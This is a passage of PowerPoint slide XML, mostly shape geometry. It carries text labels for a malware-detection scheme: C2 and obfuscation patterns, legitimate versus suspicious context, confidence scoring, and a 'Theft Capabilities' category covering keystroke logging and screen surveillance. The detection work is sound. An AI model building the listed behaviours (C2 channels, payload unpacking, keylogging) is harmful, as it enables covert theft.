                  <a:pt x="139192" y="41700"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="29156" y="139165"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2575" y="112583"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="-886" y="109122"/>
                  <a:pt x="-886" y="103501"/>
                  <a:pt x="2575" y="100040"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="29156" y="73459"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="31704" y="70911"/>
                  <a:pt x="35497" y="70164"/>
                  <a:pt x="38820" y="71548"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="42143" y="72933"/>
                  <a:pt x="44302" y="76172"/>
                  <a:pt x="44302" y="79744"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="44302" y="97465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132907" y="97465"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="137808" y="97465"/>
                  <a:pt x="141767" y="101425"/>
                  <a:pt x="141767" y="106326"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="141767" y="111227"/>
                  <a:pt x="137808" y="115186"/>
                  <a:pt x="132907" y="115186"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="44302" y="115186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44302" y="132907"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="44302" y="136479"/>
                  <a:pt x="42143" y="139718"/>
                  <a:pt x="38820" y="141103"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35497" y="142487"/>
                  <a:pt x="31704" y="141712"/>
                  <a:pt x="29156" y="139192"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF8904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0" name="Text 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7782868" y="2842435"/>
            <a:ext cx="3866872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C2 Pattern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556205" y="3090529"/>
            <a:ext cx="4084674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 initialization + key exchange + encrypted packets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449879" y="3444947"/>
            <a:ext cx="4235302" cy="637953"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4235302" h="637953">
                <a:moveTo>
                  <a:pt x="35445" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4199858" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4219433" y="0"/>
                  <a:pt x="4235302" y="15869"/>
                  <a:pt x="4235302" y="35445"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4235302" y="602509"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4235302" y="622084"/>
                  <a:pt x="4219433" y="637953"/>
                  <a:pt x="4199858" y="637953"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35445" y="637953"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15869" y="637953"/>
                  <a:pt x="0" y="622084"/>
                  <a:pt x="0" y="602509"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="35445"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15882"/>
                  <a:pt x="15882" y="0"/>
                  <a:pt x="35445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3" name="Shape 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7565065" y="3579628"/>
            <a:ext cx="159488" cy="141767"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="159488" h="141767">
                <a:moveTo>
                  <a:pt x="11352" y="-6895"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="8750" y="-9497"/>
                  <a:pt x="4541" y="-9497"/>
                  <a:pt x="1966" y="-6895"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-609" y="-4292"/>
                  <a:pt x="-637" y="-83"/>
                  <a:pt x="1938" y="2520"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="148136" y="148717"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="150739" y="151320"/>
                  <a:pt x="154947" y="151320"/>
                  <a:pt x="157522" y="148717"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160098" y="146115"/>
                  <a:pt x="160125" y="141906"/>
                  <a:pt x="157522" y="139331"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="130830" y="112639"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="131578" y="111974"/>
                  <a:pt x="132326" y="111310"/>
                  <a:pt x="133045" y="110645"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="146004" y="98600"/>
                  <a:pt x="154670" y="84230"/>
                  <a:pt x="158796" y="74345"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="159710" y="72157"/>
                  <a:pt x="159710" y="69721"/>
                  <a:pt x="158796" y="67533"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="154670" y="57648"/>
                  <a:pt x="146004" y="43250"/>
                  <a:pt x="133045" y="31233"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="120004" y="19133"/>
                  <a:pt x="102089" y="8916"/>
                  <a:pt x="79716" y="8916"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63989" y="8916"/>
                  <a:pt x="50477" y="13955"/>
                  <a:pt x="39291" y="21154"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11352" y="-6895"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="56624" y="38405"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="63131" y="33753"/>
                  <a:pt x="71133" y="31012"/>
                  <a:pt x="79744" y="31012"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="101757" y="31012"/>
                  <a:pt x="119616" y="48871"/>
                  <a:pt x="119616" y="70884"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119616" y="79495"/>
                  <a:pt x="116875" y="87469"/>
                  <a:pt x="112223" y="94004"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="102615" y="84396"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="106132" y="78470"/>
                  <a:pt x="107322" y="71188"/>
                  <a:pt x="105412" y="63989"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="101618" y="49812"/>
                  <a:pt x="87026" y="41395"/>
                  <a:pt x="72850" y="45188"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70468" y="45825"/>
                  <a:pt x="68226" y="46767"/>
                  <a:pt x="66204" y="47957"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="56596" y="38349"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="90072" y="109399"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="86777" y="110285"/>
                  <a:pt x="83316" y="110756"/>
                  <a:pt x="79744" y="110756"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="57731" y="110756"/>
                  <a:pt x="39872" y="92896"/>
                  <a:pt x="39872" y="70884"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39872" y="67312"/>
                  <a:pt x="40343" y="63851"/>
                  <a:pt x="41229" y="60556"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19216" y="38543"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10190" y="48733"/>
                  <a:pt x="3987" y="59531"/>
                  <a:pt x="692" y="67478"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-222" y="69665"/>
                  <a:pt x="-222" y="72102"/>
                  <a:pt x="692" y="74289"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4818" y="84174"/>
                  <a:pt x="13485" y="98573"/>
                  <a:pt x="26443" y="110590"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39484" y="122690"/>
                  <a:pt x="57399" y="132907"/>
                  <a:pt x="79772" y="132907"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="90100" y="132907"/>
                  <a:pt x="99486" y="130720"/>
                  <a:pt x="107876" y="127203"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="90100" y="109427"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FDC700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4" name="Text 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7782868" y="3551273"/>
            <a:ext cx="3866872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Obfuscation Pattern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7556205" y="3799366"/>
            <a:ext cx="4084674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String decryption + payload unpacking + code execution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7318744" y="4373522"/>
            <a:ext cx="4518837" cy="2418907"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4518837" h="2418907">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4518837" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4518837" y="2418907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2418907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7" name="Shape 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7318744" y="4373522"/>
            <a:ext cx="35442" cy="2418907"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35442" h="2418907">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35442" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35442" y="2418907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2418907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8" name="Shape 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7478233" y="4550731"/>
            <a:ext cx="221512" cy="177209"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="221512" h="177209">
                <a:moveTo>
                  <a:pt x="132907" y="11076"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="177209" y="11076"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="183335" y="11076"/>
                  <a:pt x="188285" y="16025"/>
                  <a:pt x="188285" y="22151"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="188285" y="28277"/>
                  <a:pt x="183335" y="33227"/>
                  <a:pt x="177209" y="33227"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="137891" y="33227"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="136091" y="42156"/>
                  <a:pt x="129965" y="49529"/>
                  <a:pt x="121831" y="53059"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="121831" y="155058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177209" y="155058"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="183335" y="155058"/>
                  <a:pt x="188285" y="160008"/>
                  <a:pt x="188285" y="166134"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="188285" y="172260"/>
                  <a:pt x="183335" y="177209"/>
                  <a:pt x="177209" y="177209"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="44302" y="177209"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="38176" y="177209"/>
                  <a:pt x="33227" y="172260"/>
                  <a:pt x="33227" y="166134"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33227" y="160008"/>
                  <a:pt x="38176" y="155058"/>
                  <a:pt x="44302" y="155058"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="99680" y="155058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99680" y="53059"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="91547" y="49494"/>
                  <a:pt x="85420" y="42122"/>
                  <a:pt x="83621" y="33227"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="44302" y="33227"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="38176" y="33227"/>
                  <a:pt x="33227" y="28277"/>
                  <a:pt x="33227" y="22151"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33227" y="16025"/>
                  <a:pt x="38176" y="11076"/>
                  <a:pt x="44302" y="11076"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="88605" y="11076"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="93658" y="4361"/>
                  <a:pt x="101688" y="0"/>
                  <a:pt x="110756" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119824" y="0"/>
                  <a:pt x="127854" y="4361"/>
                  <a:pt x="132907" y="11076"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="152151" y="110756"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="202268" y="110756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177209" y="67769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152151" y="110756"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="177209" y="143983"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="155439" y="143983"/>
                  <a:pt x="137337" y="132215"/>
                  <a:pt x="133599" y="116674"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132699" y="112867"/>
                  <a:pt x="133945" y="108956"/>
                  <a:pt x="135918" y="105564"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="168868" y="49079"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="170599" y="46102"/>
                  <a:pt x="173783" y="44302"/>
                  <a:pt x="177209" y="44302"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="180636" y="44302"/>
                  <a:pt x="183820" y="46137"/>
                  <a:pt x="185551" y="49079"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="218500" y="105564"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="220473" y="108956"/>
                  <a:pt x="221719" y="112867"/>
                  <a:pt x="220819" y="116674"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="217081" y="132180"/>
                  <a:pt x="198980" y="143983"/>
                  <a:pt x="177209" y="143983"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="43887" y="67769"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18828" y="110756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68980" y="110756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43887" y="67769"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="312" y="116674"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="-588" y="112867"/>
                  <a:pt x="658" y="108956"/>
                  <a:pt x="2630" y="105564"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35580" y="49079"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="37311" y="46102"/>
                  <a:pt x="40495" y="44302"/>
                  <a:pt x="43922" y="44302"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47348" y="44302"/>
                  <a:pt x="50532" y="46137"/>
                  <a:pt x="52263" y="49079"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="85213" y="105564"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="87186" y="108956"/>
                  <a:pt x="88432" y="112867"/>
                  <a:pt x="87532" y="116674"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="83794" y="132180"/>
                  <a:pt x="65692" y="143983"/>
                  <a:pt x="43922" y="143983"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22151" y="143983"/>
                  <a:pt x="4050" y="132215"/>
                  <a:pt x="312" y="116674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9" name="Text 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7699744" y="4515290"/>
            <a:ext cx="4084674" cy="2480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9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Context Analysis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7478233" y="4869708"/>
            <a:ext cx="283535" cy="283535"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="283535" h="283535">
                <a:moveTo>
                  <a:pt x="35442" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="248093" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="267667" y="0"/>
                  <a:pt x="283535" y="15868"/>
                  <a:pt x="283535" y="35442"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="283535" y="248093"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="283535" y="267667"/>
                  <a:pt x="267667" y="283535"/>
                  <a:pt x="248093" y="283535"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35442" y="283535"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15868" y="283535"/>
                  <a:pt x="0" y="267667"/>
                  <a:pt x="0" y="248093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00C950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1" name="Shape 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7557977" y="4940592"/>
            <a:ext cx="124047" cy="141767"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="124047" h="141767">
                <a:moveTo>
                  <a:pt x="120392" y="19410"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="124351" y="22290"/>
                  <a:pt x="125237" y="27827"/>
                  <a:pt x="122357" y="31787"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="51474" y="129252"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="49951" y="131356"/>
                  <a:pt x="47597" y="132658"/>
                  <a:pt x="44995" y="132879"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="42392" y="133101"/>
                  <a:pt x="39872" y="132132"/>
                  <a:pt x="38045" y="130304"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2603" y="94862"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="-858" y="91401"/>
                  <a:pt x="-858" y="85780"/>
                  <a:pt x="2603" y="82319"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6064" y="78858"/>
                  <a:pt x="11685" y="78858"/>
                  <a:pt x="15146" y="82319"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="43250" y="110424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108042" y="21348"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="110922" y="17389"/>
                  <a:pt x="116460" y="16503"/>
                  <a:pt x="120419" y="19382"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="05DF7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2" name="Text 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7868093" y="4869708"/>
            <a:ext cx="3535326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Legitimate Use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7868093" y="5082359"/>
            <a:ext cx="3526465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Software licensing, secure communications, password managers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7478233" y="5365894"/>
            <a:ext cx="283535" cy="283535"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="283535" h="283535">
                <a:moveTo>
                  <a:pt x="35442" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="248093" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="267667" y="0"/>
                  <a:pt x="283535" y="15868"/>
                  <a:pt x="283535" y="35442"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="283535" y="248093"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="283535" y="267667"/>
                  <a:pt x="267667" y="283535"/>
                  <a:pt x="248093" y="283535"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35442" y="283535"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15868" y="283535"/>
                  <a:pt x="0" y="267667"/>
                  <a:pt x="0" y="248093"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="35442"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15881"/>
                  <a:pt x="15881" y="0"/>
                  <a:pt x="35442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5" name="Shape 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7602279" y="5436778"/>
            <a:ext cx="35442" cy="141767"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35442" h="141767">
                <a:moveTo>
                  <a:pt x="26581" y="8860"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="26581" y="3960"/>
                  <a:pt x="22622" y="0"/>
                  <a:pt x="17721" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12820" y="0"/>
                  <a:pt x="8860" y="3960"/>
                  <a:pt x="8860" y="8860"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8860" y="97465"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8860" y="102366"/>
                  <a:pt x="12820" y="106326"/>
                  <a:pt x="17721" y="106326"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22622" y="106326"/>
                  <a:pt x="26581" y="102366"/>
                  <a:pt x="26581" y="97465"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="26581" y="8860"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17721" y="141767"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="23840" y="141767"/>
                  <a:pt x="28797" y="136811"/>
                  <a:pt x="28797" y="130692"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28797" y="124573"/>
                  <a:pt x="23840" y="119616"/>
                  <a:pt x="17721" y="119616"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11602" y="119616"/>
                  <a:pt x="6645" y="124573"/>
                  <a:pt x="6645" y="130692"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6645" y="136811"/>
                  <a:pt x="11602" y="141767"/>
                  <a:pt x="17721" y="141767"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF6467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6" name="Text 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7868093" y="5365894"/>
            <a:ext cx="3127744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Suspicious Context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7868093" y="5578545"/>
            <a:ext cx="3118884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Mass file access, unknown processes, C2 communication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7478233" y="5862080"/>
            <a:ext cx="4217581" cy="637953"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4217581" h="637953">
                <a:moveTo>
                  <a:pt x="35445" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4182137" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4201712" y="0"/>
                  <a:pt x="4217581" y="15869"/>
                  <a:pt x="4217581" y="35445"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4217581" y="602509"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4217581" y="622084"/>
                  <a:pt x="4201712" y="637953"/>
                  <a:pt x="4182137" y="637953"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35445" y="637953"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15869" y="637953"/>
                  <a:pt x="0" y="622084"/>
                  <a:pt x="0" y="602509"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="35445"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15882"/>
                  <a:pt x="15882" y="0"/>
                  <a:pt x="35445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9" name="Text 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7584558" y="5968406"/>
            <a:ext cx="4066953" cy="1772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77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Confidence Scoring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7584558" y="6181057"/>
            <a:ext cx="4075814" cy="21265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16" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E1E3E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Crypto operations combined with network activity = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1116" b="1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6677" y="403344"/>
            <a:ext cx="73335" cy="586683"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="73335" h="586683">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="73335" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73335" y="586683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="586683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" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="586683" y="366677"/>
            <a:ext cx="3382592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kern="0" spc="115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Category 06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586683" y="660018"/>
            <a:ext cx="3474262" cy="36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99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Theft Capabilities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86683" y="1173365"/>
            <a:ext cx="11321143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99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Information-stealing behaviors including keystroke logging and visual surveillance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385011" y="1576710"/>
            <a:ext cx="5637654" cy="3685101"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5637654" h="3685101">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5637654" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5637654" y="3685101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3685101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7" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385011" y="1576710"/>
            <a:ext cx="36668" cy="3685101"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="36668" h="3685101">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="36668" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36668" y="3685101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3685101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8" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550015" y="1723380"/>
            <a:ext cx="440012" cy="440012"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="440012" h="440012">
                <a:moveTo>
                  <a:pt x="36666" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="403346" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="423596" y="0"/>
                  <a:pt x="440012" y="16416"/>
                  <a:pt x="440012" y="36666"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="440012" y="403346"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="440012" y="423596"/>
                  <a:pt x="423596" y="440012"/>
